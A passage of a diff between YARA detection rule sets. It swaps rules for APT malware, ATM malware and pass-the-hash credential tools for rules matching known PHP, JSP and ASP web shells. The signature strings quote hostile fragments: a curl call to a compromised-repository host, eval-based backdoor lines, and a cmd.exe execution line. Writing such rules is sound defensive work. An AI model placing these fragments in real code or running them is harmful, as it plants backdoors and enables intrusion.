-		hash1 = "6974b8acf6a8f7684673b01753c3a8248a1c491900cccf771db744ca0442f96a"
-		hash2 = "165a7853ef51e96ce3f88bb33f928925b24ca5336e49845fc5fc556812092740"
-		hash3 = "4470e40f63443aa27187a36bbb0c2f4def42b589b61433630df842b6e365ae3d"
-		hash4 = "c21cf6018c2ee0a90b9d2c401aae8071c90b5a4bc9848a94d678d77209464f79"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "iiodttd.eWt" fullword ascii
-		$x2 = "irnnaar-ite-ornaa-naa-asoeienaeaanlagoeas:acnuihaaa" fullword ascii
-		$x3 = "NURVNTURVORSMSPPRTQMPTTQOQRP" fullword ascii
+		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
+		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "279adfbd42308a07b3131ee57d067b3e" or 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Greyenergy_Malware_Oct18_5 : FILE
+rule SIGNATURE_BASE_Webshell_Jspspyweb
 {
 	meta:
-		description = "Detects samples from Grey Energy report"
+		description = "Web Shell - file Jspspyweb.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a8c4517d-912d-5264-b9ab-acdf37fc4d56"
-		date = "2018-10-17"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_greyenergy.yar#L84-L97"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L111-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3ced67c514d54324b41a4a4a92c1d3138e75380f3129b39ae92c1895c267acb2"
-		score = 75
+		hash = "4e9be07e95fff820a9299f3fb4ace059"
+		logic_hash = "491d9c4efee27469f2a26f6fcb7f7c768eac60977e640096ea5f78ff346e7fbe"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "037723bdb9100d19bf15c5c21b649db5f3f61e421e76abe9db86105f1e75847b"
-		hash2 = "b602ce32b7647705d68aedbaaf4485f1a68253f8f8132bd5d5f77284a6c2d8bb"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s12 = "WespySSld.eQ" fullword ascii
+		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
+		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		all of them
 }
-
-rule SIGNATURE_BASE_ATM_Malware_Dispenserxfs_1 : FILE
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2
 {
 	meta:
-		description = "Detects ATM Malware DispenserXFS"
-		author = "@Xylit0l @r3c0nst / Modified by Florian Roth"
-		id = "7c06102c-93d3-52f4-8c25-430f6f7a601f"
-		date = "2019-02-27"
-		modified = "2023-01-06"
-		reference = "https://twitter.com/r3c0nst/status/1100775857306652673"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_atm_dispenserxfs.yar#L4-L24"
+		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L126-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c7331b29f7cd8c40f99e235664f86361ba99c9ca0092c1cfb6faf367764303e"
-		score = 80
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+		logic_hash = "d3d27d80f5f3adbc050a59d0c25953ec5d634344b5d051a4abdf4eeed3b8b035"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
-		$s1 = "\\dispenserXFS.pdb" ascii
-		$s3 = "C:\\xfsasdf.txt" fullword ascii
-		$s4 = "Injected mxsfs killer into %d." fullword ascii
-		$s5 = "Waiting for freeze msxfs processes..." fullword ascii
+		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
+		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of them or pe.imphash ( ) == "617e037ae26d1931818db0790fb44bfe" )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Github_Repo_Compromise_Myjino_Ru_Aug22
+rule SIGNATURE_BASE_Webshell_Simattacker_Vrsion_1_0_0_Priv8_4_My_Friend
 {
 	meta:
-		description = "Detects URL mentioned in report on compromised Github repositories in August 2022"
+		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1eaabad5-d0de-5d17-a5fa-3c638354843d"
-		date = "2022-08-03"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/stephenlacy/status/1554697077430505473"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_repo_compromise_myjino_ru.yar#L2-L15"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L141-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5cbe6ee46a68d89b1e772762e29baa907458235cd014f20a0d0932e95c046f19"
-		score = 90
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+		logic_hash = "fc553942b06b305f7b0d5b072a8d4517b0e51229545440ea9c43e9be01d64efa"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "curl http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
-		$x2 = "http__.Post(\"http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
+		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
+		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_SUSP_Autocad_Lsp_Malware : FILE
+rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Pwhash
 {
 	meta:
-		description = "Recognizes malicious autocad files written in LISP"
-		author = "John Lambert @JohnLaTwC"
-		id = "3a4ac6e1-d7ea-5b9a-a386-9f881fad073b"
-		date = "2019-02-04"
-		modified = "2023-12-05"
-		reference = "http://cadablog.blogspot.com/2012/06/acadmedrea-malware-autocad-based-virus.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_autocad_lsp_malware.yar#L1-L52"
+		description = "Web Shell - file pwhash.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L156-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4a5fe7016e27431407435541ab71ab00e6fd53418e2ebc19f8764c98728b89a6"
-		score = 65
-		quality = 27
-		tags = "FILE"
-		hash1 = "1313398e2f39fcf17225c7e915b92bd74292d427163112d70b82f271359b84d5"
-		hash2 = "2382e6908e6b44c0676c537cb8caa239c8938cb01e62a45c7247d40ab7dbf0ad"
-		hash3 = "23cf3e7f41a755a45e396e5caa3e753e64655b91fe665808f71aa68718670dc8"
-		hash4 = "23f018135afc4890e1e09bef9386e45e2236fc43550383b7888cddbdefbcd950"
-		hash5 = "4a8da078a02fc49b7f13cd19d10519b1bf31ed0ab04268f018ad4733918e28ff"
-		hash6 = "4cca7b530213ef71b2e69a5b11178b61044f93dc60f4e8e568ddb3bb06749ba2"
-		hash7 = "5390271899e1ebf884380f5da7d26dff527d13922d3b3f8a3b5ec9152b9dfa40"
-		hash8 = "53ef3029f36a3a2b912a722d64eef04f599f6f683c6dcb31a122ab1c98f38700"
-		hash9 = "7f7d78931370fa693cbfa50aadecc09b4ab93917dcde3a653bd67fa6dc274cdc"
-		hash10 = "8147cc97b6203c7eccfbd10457eb52527f74180ebae79bf3cb9c9edb582e708c"
-		hash11 = "8a3113ceb45725539e4ccef5ea1482c29b2bbe0ce7ede72f59f9949a0e04c5cd"
-		hash12 = "a0c77993f84ca8fb3096579088326bc907b003327f5885660ea5ba47e2cbc6de"
-		hash13 = "a20ac5e0bfa2ee3cb4092907420c23d1f94a1ed1b59cc3d351e5602d7206178c"
-		hash14 = "b201969ed7bf782d01011211b48bfccb9dd41a3a5a7456cdff2167f1e4d1b954"
-		hash15 = "b2bac49288329a777e7aa7001e9383eec75719c08f2aa8c278b44fabeb74844f"
-		hash16 = "b772dce92319bb48df39db6ab701761bd7645a771fd7f394510d5951695e7e96"
-		hash17 = "c116cc4db6f77c580c1c4f8acda537ed04e597739bc83011773dbeb77adf93e3"
-		hash18 = "ca1b9026b5d69c0981ca088330180d4865602fc2b514fd838664d3e11eab4468"
-		hash19 = "d7a814d677f9f9dd9666dc4f4bb9cca88fa90bdb074e87006e8810eef9a0fb32"
-		hash20 = "e4acfb69006b8aecf5801e36e2c69ccfeea2e8cbad4ceda9228d2dae2c8fd023"
-		hash21 = "f9d6b894ca907145464058a4e2c78de84bf592609b46f3573bfd9e0029e1c778"
+		hash = "ba120abac165a5a30044428fac1970d8"
+		logic_hash = "616c0570550cdb9394b5675864d4eec3fa62390f880817406b2a3b63952b69f0"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = /\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)\s*\(chr\s+\d+\)/
-		$s2 = /vl\-list\-\>string\s+\'\(\d+\s+\d+\s+\d+\s+\d+\s+\d+\s+/
-		$m1 = "strcat" nocase fullword
-		$m2 = "write-line" nocase fullword
-		$m3 = "open" nocase fullword
-		$m4 = /acad\w*\.lsp\"/ nocase fullword
-		$n1 = "vl-registry-write" nocase fullword
-		$n2 = "NOHIDDEN" nocase fullword
-		$n3 = "vlax-create-object " nocase fullword
+		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
+		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
 
 	condition:
-		filesize < 1MB and uint8( 0 ) == 0x28 and ( 1 of ( $s* ) or all of ( $m* ) or all of ( $n* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_Hizorrat : FILE
+rule SIGNATURE_BASE_Webshell_Phpremoteview
 {
 	meta:
-		description = "Detects hiZor RAT"
-		author = "Florian Roth"
-		id = "06fd02f2-2630-5aac-8011-67d67ff42c3f"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hizor_rat.yar#L1-L28"
+		description = "Web Shell - file PHPRemoteView.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L171-L185"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4e3224d34db788d2cba9da74690bf75429d6e8a516d7666d0331e465d08640cb"
-		score = 75
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+		logic_hash = "2de48b8640c0f2089a4a0badb4429127cb61ac972459290041e20b959e4e0c05"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
-		hash2 = "d9821468315ccd3b9ea03161566ef18e"
-		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }
-		$s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }
-		$s3 = { 80 [2] 2e 40 3b ?? 72 ?? }
-		$s4 = "CmdProcessExited" wide ascii
-		$s5 = "rootDir" wide ascii
-		$s6 = "DllRegisterServer" wide ascii
-		$s7 = "GetNativeSystemInfo" wide ascii
-		$s8 = "%08x%08x%08x%08x" wide ascii
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Whosthere_Alt : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_12302
 {
 	meta:
-		description = "Auto-generated rule - file whosthere-alt.exe"
+		description = "Web Shell - file 12302.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L10-L31"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L186-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
-		logic_hash = "ef7bccb8f63034b885cfaec27663c9b038cd9b1811b4f25a9eae28640dac248b"
-		score = 80
+		hash = "a3930518ea57d899457a62f372205f7f"
+		logic_hash = "0959a138abc791f17344e25e84b24888ddfe238981fc7e3ffd76c0390006ea46"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
-		$s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
-		$s2 = "dump output to a file, -o filename" fullword ascii
-		$s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii
-		$s4 = "Error: pth.dll is not in the current directory!." fullword ascii
-		$s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii
-		$s6 = ".\\pth.dll" fullword ascii
-		$s7 = "Cannot get LSASS.EXE PID!" fullword ascii
+		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
+		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 280KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Iam_Alt_Iam_Alt : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_Guo
 {
 	meta:
-		description = "Auto-generated rule - file iam-alt.exe"
+		description = "Web Shell - file guo.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf8ec963-ed23-531e-8ea2-ff9f8643aa75"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L33-L54"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L202-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
-		logic_hash = "acd4dae57e8394d4ce2f3dfb44706ea35c3d684ab34fd0c707b6aeedd816280a"
-		score = 80
+		hash = "9e69a8f499c660ee0b4796af14dc08f0"
+		logic_hash = "efb7055f42dd6be41ea3983cacea1a70b83675c8ebcb88ae3b250066a29e94eb"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
-		$s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
-		$s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii
-		$s3 = "username:domainname:lmhash:nthash" fullword ascii
-		$s4 = "Error in cmdline!. Bye!." fullword ascii
-		$s5 = "Error: Cannot open LSASS.EXE!." fullword ascii
-		$s6 = "nthash is too long!." fullword ascii
-		$s7 = "LSASS HANDLE: %x" fullword ascii
+		$s0 = "<?php ($www= $_POST['ice'])!"
+		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Genhash_Genhash : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Redcod
 {
 	meta:
-		description = "Auto-generated rule - file genhash.exe"
+		description = "Web Shell - file redcod.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bec3c014-df3b-5ac0-9501-9b648856e02b"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L56-L74"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L217-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
-		logic_hash = "fe1ebe7ea94351610e0042eab020d155cbab26d790477909467c9b5a827fb6d6"
-		score = 80
+		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
+		logic_hash = "eddfd90d27793756bcc685ffe33b2dabc3bb28b9654c33a0f99359e8b6f13678"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "genhash.exe <password>" fullword ascii
-		$s3 = "Password: %s" fullword ascii
-		$s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii
-		$s5 = "This tool generates LM and NT hashes." fullword ascii
-		$s6 = "(hashes format: LM Hash:NT hash)" fullword ascii
+		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
+		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Iam_Iamdll : FILE
+rule SIGNATURE_BASE_Webshell_Remview_Fix
 {
 	meta:
-		description = "Auto-generated rule - file iamdll.dll"
+		description = "Web Shell - file remview_fix.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15e8ddac-af17-5509-b552-b4364af57c90"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L76-L92"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L232-L246"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
-		logic_hash = "ef7c66d2e1204a43921b6701812ea8a7bfa8e39e24d9396c95b725a4a4171010"
-		score = 80
+		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
+		logic_hash = "0b29ef74fb0786aefe99281360dc4fe27005eac345a36bc14259afa6fc555303"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "LSASRV.DLL" fullword ascii
-		$s1 = "iamdll.dll" fullword ascii
-		$s2 = "ChangeCreds" fullword ascii
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Iam_Iam : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Cmd
 {
 	meta:
-		description = "Auto-generated rule - file iam.exe"
+		description = "Web Shell - file cmd.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15e8ddac-af17-5509-b552-b4364af57c90"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L94-L114"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L247-L262"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
-		logic_hash = "f170f6f71b81a674a269ddd441c77a43afbbfe2870e1d0c4101abd2e58bff0b0"
-		score = 80
+		hash = "895ca846858c315a3ff8daa7c55b3119"
+		logic_hash = "8e72b54267c2f83b288cdd43ccd56ae4ab1f95c17f4dde077e637d951df54866"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
-		$s2 = "iam.exe -h administrator:mydomain:" ascii
-		$s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii
-		$s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii
-		$s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii
-		$s6 = "Error in cmdline!. Bye!." fullword ascii
-		$s7 = "Checking LSASRV.DLL...." fullword ascii
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Whosthere_Alt_Pth : FILE
+rule SIGNATURE_BASE_Webshell_Php_Sh_Server
 {
 	meta:
-		description = "Auto-generated rule - file pth.dll"
+		description = "Web Shell - file server.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L116-L134"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L263-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
-		logic_hash = "137b0dae105f97b5d4352d16e52144e72306e61be57c5d93df77ad3f5808018e"
-		score = 80
+		hash = "d87b019e74064aa90e2bb143e5e16cfa"
+		logic_hash = "9f4d940a381e7bd298a252f485d5f1d26fd191c27f6e86e8fa6028237592a8c3"
+		score = 50
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c:\\debug.txt" fullword ascii
-		$s1 = "pth.dll" fullword ascii
-		$s2 = "\"Primary\" string found at %.8Xh" fullword ascii
-		$s3 = "\"Primary\" string not found!" fullword ascii
-		$s4 = "segment 1 found at %.8Xh" fullword ascii
+		$s0 = "eval(getenv('HTTP_CODE'));" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and 4 of them
+		all of them
 }
-rule SIGNATURE_BASE_Whosthere : FILE
+rule SIGNATURE_BASE_Webshell_PH_Vayv_PH_Vayv
 {
 	meta:
-		description = "Auto-generated rule - file whosthere.exe"
+		description = "Web Shell - file PH Vayv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
-		date = "2015-07-10"
-		modified = "2023-12-05"
-		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L136-L155"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
